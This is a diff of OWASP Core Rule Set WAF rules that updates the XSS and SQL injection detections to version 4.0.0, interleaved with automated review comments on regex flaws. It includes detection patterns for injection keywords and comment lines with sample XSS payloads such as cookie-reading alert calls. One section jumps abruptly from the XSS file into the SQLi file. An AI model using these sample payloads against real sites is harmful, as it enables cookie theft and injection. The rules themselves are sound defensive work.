@@ -605,14 +660,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'application-multi',\ tag:'language-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242/63',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Prevent 941180 bypass by using JavaScript global variables @@ -622,7 +677,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # - /?search=/?a=";+alert(self["document"]["cookie"]);// # - /?search=/?a=";+document+/*foo*/+.+/*bar*/+cookie;// # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?:self|document|this|top|window)\s*(?:/\*|[\[)]).+?(?:\]|\*/)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?:self|document|this|top|window)\s*(?:/\*|[\[)]).+?(?:\]|\*/)" \ "id:941370,\ phase:2,\ block,\ 
@@ -633,28 +688,90 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML: tag:'application-multi',\ tag:'language-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242/63',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# JavaScript methods which take code as a string types are considered unsafe. +# Unsafe JS functions like eval(), setInterval(), setTimeout() +# Unsafe JS constructor new Function() +# https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#dangerous-contexts +# https://snyk.io/blog/5-ways-to-prevent-code-injection-in-javascript-and-node-js/ +# +# Regular expression generated from regex-assembly/941390.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 941390 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)\b(?:eval|set(?:timeout|interval)|new[\s\v]+Function|a(?:lert|tob)|btoa|prompt|confirm)[\s\v]*\(" \ + "id:941390,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,t:jsDecode,\ + msg:'Javascript method detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# JavaScript function without parentheses +# Reference: 
https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses +# +# Example Payloads: +# [].sort.call`${alert}1337` +# [].map.call`${eval}\\u{61}lert\x281337\x29` +# Reflect.apply.call`${navigation.navigate}${navigation}${[name]}` +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx ((?:\[[^\]]*\][^.]*\.)|Reflect[^.]*\.).*(?:map|sort|apply)[^.]*\..*call[^`]*`.*`" \ + "id:941400,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:compressWhitespace,\ + msg:'XSS JavaScript function without parentheses',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # # # This is a stricter sibling of rule 941100. 
# -SecRule REQUEST_HEADERS:Referer "@detectXSS" \ +SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \ "id:941101,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ 
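Review bot: The new 941400 pattern chains three unbounded `.*` segments (`…\.).*(?:map|sort|apply)[^.]*\..*call[^`]*`.*``) over attacker-controlled input, so a long value containing many `.`/`[`/`]` characters and `map`/`call` tokens but no closing backtick forces heavy backtracking before the rule fails; in ModSecurity that surfaces as PCRE match-limit errors rather than a hang, but it is paid on every request that reaches the rule. Bounding the gaps with backtick-excluding classes, e.g. `((?:\[[^\]]*\][^.]*\.)|Reflect[^.]*\.)[^`]*(?:map|sort|apply)[^.`]*\.[^`]*call[^`]*`[^`]*``, still matches the three example payloads in the comment while stopping the scan at the template literal. The leading capturing group is unused (`logdata` reports `%{TX.0}`), so it could be non-capturing. Also, the sibling rule 941390 in the same hunk runs `t:none,t:htmlEntityDecode,t:jsDecode` while 941400 runs `t:none,t:urlDecodeUni,t:compressWhitespace`; presumably deliberate, but two new keyword rules seeing differently normalised input deserves a one-line comment explaining why.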
@@ -664,21 +781,55 @@ SecRule REQUEST_HEADERS:Referer "@detectXSS" \ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 2 ]=- +# XSS vectors making use of event handlers like onerror, onload etc, e.g., +# +# We are not listing all the known event handlers like rule 941160, but we +# limit the alerts to keywords of 3-25 characters after the prefix ("on"). +# +# The shortest known event is "onget". The longest known event is "onmozorientationchange" +# with 23 chars after the prefix. 25 chars adds a little bit of safety. +# +# This rule has been moved to PL2 since it has a tendency to trigger on random input. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\s\"'`;/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]{3,25}[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=[^=]" \ + "id:941120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 2: Event Handler Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # 
-=[ XSS Filters - Category 5 ]=- # HTML attributes - src, style and href # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" \ "id:941150,\ phase:2,\ block,\ 
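Review bot: The explanatory comment for 941120 miscounts the longest handler: `mozorientationchange` is 20 characters after the `on` prefix (22 including it), not 23, so the `{3,25}` bound still holds but the rationale should read `# The longest known event is "onmozorientationchange" with 20 chars after the prefix. 25 chars adds a little bit of safety.` In the pattern itself `\x3B` appears twice in both character classes and `\x09`/`\x0B`/`\x0C` are already covered by `\s`; harmless, but it suggests the classes were merged by hand, and a deduplicated class (`[\s\"'`;/0-9=,(]` for the leading one) would be easier to audit. The hunk ends inside 941150, whose action list continues past it.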
@@ -690,16 +841,48 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ + tag:'xss-perf-disable',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +# +# [Deny List Keywords from Node-Validator] +# https://github.com/validatorjs/validator.js/ +# This rule is a stricter sibling of 941180 (PL1) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@contains -->" \ + "id:941181,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:lowercase,t:removeNulls,\ + msg:'Node-Validator Deny List Keywords',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ XSS Filters from IE ]=- + # Detect tags that are the most common direct HTML injection points. # # ~])" \ +# Regular expression generated from regex-assembly/942230.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942230 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\v\(-\)]case[\s\v]+when.*?then|\)[\s\v]*?like[\s\v]*?\(|select.*?having[\s\v]*?[^\s\v]+[\s\v]*?[^\s\v0-9A-Z_a-z]|if[\s\v]?\([0-9A-Z_a-z]+[\s\v]*?[<->~]" \ "id:942230,\ phase:2,\ block,\ 
@@ -219,20 +268,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942240.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942240.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942240.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942240 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:[\"'`](?:;*?\s*?waitfor\s+(?:delay|time)\s+[\"'`]|;.*?:\s*?goto)|alter\s*?\w+.*?cha(?:racte)?r\s+set\s+\w+))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)alter[\s\v]*?[0-9A-Z_a-z]+.*?char(?:acter)?[\s\v]+set[\s\v]+[0-9A-Z_a-z]+|[\"'`](?:;*?[\s\v]*?waitfor[\s\v]+(?:time|delay)[\s\v]+[\"'`]|;.*?:[\s\v]*?goto)" \ "id:942240,\ phase:2,\ block,\ 
@@ -248,10 +294,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:merge.*?using\s*?\(|execute\s*?immediate\s*?[\"'`]|match\s*?[\w(),+-]+\s*?against\s*?\()" \
 "id:942250,\
@@ -269,10 +315,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)union.*?select.*?from" \
 "id:942270,\
@@ -290,20 +336,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

-# Regexp generated from util/regexp-assemble/regexp-942280.data using Regexp::Assemble.
-# To rebuild the regexp:
-# cd util/regexp-assemble
-# ./regexp-assemble.pl regexp-942280.data
-# Note that after assemble an outer bracket with an ignore case flag is added
-# to the Regexp::Assemble output:
-# (?i:ASSEMBLE_OUTPUT)
+# Regular expression generated from regex-assembly/942280.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 942280
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:;\s*?shutdown\s*?(?:[#;]|\/\*|--|\{)|waitfor\s*?delay\s?[\"'`]+\s?\d|select\s*?pg_sleep))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)select[\s\v]*?pg_sleep|waitfor[\s\v]*?delay[\s\v]?[\"'`]+[\s\v]?[0-9]|;[\s\v]*?shutdown[\s\v]*?(?:[#;\{]|/\*|--)" \
 "id:942280,\
 phase:2,\
 block,\
@@ -319,12 +362,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:\[\$(?:ne|eq|lte?|gte?|n?in|mod|all|size|exists|type|slice|x?or|div|like|between|and)\]))" \
+# Regular expression generated from regex-assembly/942290.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 942290
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\[?\$(?:n(?:e|in?|o[rt])|e(?:q|xists|lemMatch)|l(?:te?|ike)|mod|a(?:ll|nd)|(?:s(?:iz|lic)|wher)e|t(?:ype|ext)|x?or|div|between|regex|jsonSchema)\]?" \
 "id:942290,\
 phase:2,\
 block,\
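Review bot: The regenerated 942290 pattern no longer contains `gt`/`gte`, which the removed pattern matched (`lte?|gte?`), so `[$gt]` and `$gte` operators now pass this rule; unless the .ra source dropped them on purpose, `g(?:te?)` should be restored in regex-assembly/942290.ra and the expression regenerated. Making both brackets optional (`\[?\$(...)\]?`) also removes the old closing-bracket anchor, and with no trailing boundary `$in`, `$ne`, `$or`, `$all` and `$mod` now fire on ordinary variable-like text such as `$index`, `$next`, `$order`, `$allow` or `$module` at PL1. Ending the operator list with `(?:\]|\b)` (or `(?![0-9A-Z_a-z])`) keeps the bracket-less forms the rewrite wanted without that cost. The rule's action list continues past the hunk.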
@@ -340,20 +388,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942320.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942320.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# This rule has a stricter sibling (942321) that checks for MySQL and PostgreSQL procedures / functions in +# request headers referer and user-agent. +# +# Regular expression generated from regex-assembly/942320.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942320 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:create\s+(?:procedure|function)\s*?\w+\s*?\(\s*?\)\s*?-|;\s*?(?:declare|open)\s+[\w-]+|procedure\s+analyse\s*?\(|declare[^\w]+[@#]\s*?\w+|exec\s*?\(\s*?\@))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)create[\s\v]+(?:function|procedure)[\s\v]*?[0-9A-Z_a-z]+[\s\v]*?\([\s\v]*?\)[\s\v]*?-|d(?:eclare[^0-9A-Z_a-z]+[#@][\s\v]*?[0-9A-Z_a-z]+|iv[\s\v]*?\([\+\-]*[\s\v\.0-9]+,[\+\-]*[\s\v\.0-9]+\))|exec[\s\v]*?\([\s\v]*?@|(?:lo_(?:impor|ge)t|procedure[\s\v]+analyse)[\s\v]*?\(|;[\s\v]*?(?:declare|open)[\s\v]+[\-0-9A-Z_a-z]+|::(?:b(?:igint|ool)|double[\s\v]+precision|int(?:eger)?|numeric|oid|real|(?:tex|smallin)t)" \ "id:942320,\ phase:2,\ block,\ 
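Review bot: The new PostgreSQL cast branch in 942320, `::(?:b(?:igint|ool)|double[\s\v]+precision|int(?:eger)?|numeric|oid|real|(?:tex|smallin)t)`, has no trailing boundary, so under `(?i)` it may also fire on scope-resolved identifiers such as `::interface`, `::internal`, `::textarea` or `::really` in values that carry PHP/C++/Ruby-style code, and this is a PL1 rule. Appending `\b` (or `(?![0-9A-Z_a-z])`) to that branch in regex-assembly/942320.ra keeps genuine casts like `::int`/`::text` while dropping those. The other additions (`div(…,…)`, `lo_import(`/`lo_get(`) are anchored on `(` and look fine. The rule's action list continues past the hunk.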
@@ -369,20 +417,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942350.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942350.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942350.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942350 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:;\s*?(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load)\b\s*?[\[(]?\w{2,}|create\s+function\s+.+\s+returns))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)create[\s\v]+function[\s\v].+[\s\v]returns|;[\s\v]*?(?:alter|(?:(?:cre|trunc|upd)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)\b[\s\v]*?[\(\[]?[0-9A-Z_a-z]{2,}" \ "id:942350,\ phase:2,\ block,\ 
@@ -398,31 +443,30 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# This rule has a stricter sibling: 942361. +# This rule has two stricter sibling: 942361 and 942362. # The keywords 'alter' and 'union' led to false positives. # Therefore they have been moved to PL2 and the keywords have been extended on PL1. +# The original version also had loose word boundaries and context checksum cause further false positives. +# Because fixing those introduced bypass, the original variant was moved to PL2 as 942362. # # Sources for SQL ALTER statements: # MySQL: https://dev.mysql.com/doc/refman/5.7/en/sql-syntax-data-definition.html -# Oracle/PLSQL: https://docs.oracle.com/apps/search/search.jsp?q=alter&size=60&category=database +# Oracle/PLSQL: https://docs.oracle.com/search/?q=alter&size=60&category=database # PostgreQSL: https://www.postgresql.org/search/?u=%2Fdocs&q=alter -# MSSQL: https://docs.microsoft.com/en-us/sql/t-sql/statements/statements -# DB2: https://www.ibm.com/support/knowledgecenter/en/search/alter?scope=SSEPGG_9.5.0 -# -# Regexp generated from util/regexp-assemble/regexp-942360.data using Regexp::Assemble. 
-# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942360.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:^[\W\d]+\s*?(?:(?:alter\s*(?:a(?:(?:pplication\s*rol|ggregat)e|s(?:ymmetric\s*ke|sembl)y|u(?:thorization|dit)|vailability\s*group)|c(?:r(?:yptographic\s*provider|edential)|o(?:l(?:latio|um)|nversio)n|ertificate|luster)|s(?:e(?:rv(?:ice|er)|curity|quence|ssion|arch)|y(?:mmetric\s*key|nonym)|togroup|chema)|m(?:a(?:s(?:ter\s*key|k)|terialized)|e(?:ssage\s*type|thod)|odule)|l(?:o(?:g(?:file\s*group|in)|ckdown)|a(?:ngua|r)ge|ibrary)|t(?:(?:abl(?:espac)?|yp)e|r(?:igger|usted)|hreshold|ext)|p(?:a(?:rtition|ckage)|ro(?:cedur|fil)e|ermission)|d(?:i(?:mension|skgroup)|atabase|efault|omain)|r(?:o(?:l(?:lback|e)|ute)|e(?:sourc|mot)e)|f(?:u(?:lltext|nction)|lashback|oreign)|e(?:xte(?:nsion|rnal)|(?:ndpoi|ve)nt)|in(?:dex(?:type)?|memory|stance)|b(?:roker\s*priority|ufferpool)|x(?:ml\s*schema|srobject)|w(?:ork(?:load)?|rapper)|hi(?:erarchy|stogram)|o(?:perator|utline)|(?:nicknam|queu)e|us(?:age|er)|group|java|view)|u(?:nion\s*(?:(?:distin|sele)ct|all)|pdate)|(?:truncat|renam)e|(?:inser|selec)t|de(?:lete|sc)|load)\b|create\s+\w+)|(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load)\s+(?:group_concat|load_file|char)\s?\(?|[\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom|[\s(]load_file\s*?\(|[\"'`]\s+regexp\W|end\s*?\);))" \ +# MSSQL: https://learn.microsoft.com/en-us/sql/t-sql/statements/statements?view=sql-server-ver16 +# DB2: https://www.ibm.com/docs/en/search/alter?scope=SSEPGG_9.5.0 +# +# Regular expression generated from regex-assembly/942360.ra. 
